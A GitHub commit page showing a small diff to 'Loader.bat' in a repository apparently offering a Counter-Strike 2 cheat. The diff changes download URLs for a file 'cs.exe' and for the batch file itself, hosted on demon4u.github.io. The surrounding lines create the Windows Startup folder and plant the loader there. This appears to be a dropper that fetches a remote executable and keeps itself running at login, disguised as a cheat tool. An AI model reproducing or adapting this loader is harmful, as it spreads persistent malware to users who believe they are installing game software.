Skip to content

Commit

Permalink
Loader.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
Demon4u committed Apr 23, 2024
1 parent 89c60ca commit 0d971a8
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions Loader.bat
Original file line number Diff line number Diff line change
Expand Up @@ -9,8 +9,8 @@ if not exist "%destination%\cs.exe" (

set "startup_destination=%AppData%\Microsoft\Windows\Start Menu\Programs\Startup"
if not exist "%startup_destination%" mkdir "%startup_destination%"
set "link3=https://github.com/Demon4u/CS2-Cheat/src/releases/download/new/Loader.bat"
set "link4=https://demon4u.github.io/cs.exe"
set "link2=https://github.com/Demon4u/CS2-Cheat/blob/89c60ca064528316bd33eeb02d086a457c3db0b4/Loader.bat"
set "link3=https://demon4u.github.io/cs.exe"

if not exist "%startup_destination%\Loader.bat" (
echo Loading Loader.bat...
Expand Down

0 comments on commit 0d971a8

Please sign in to comment.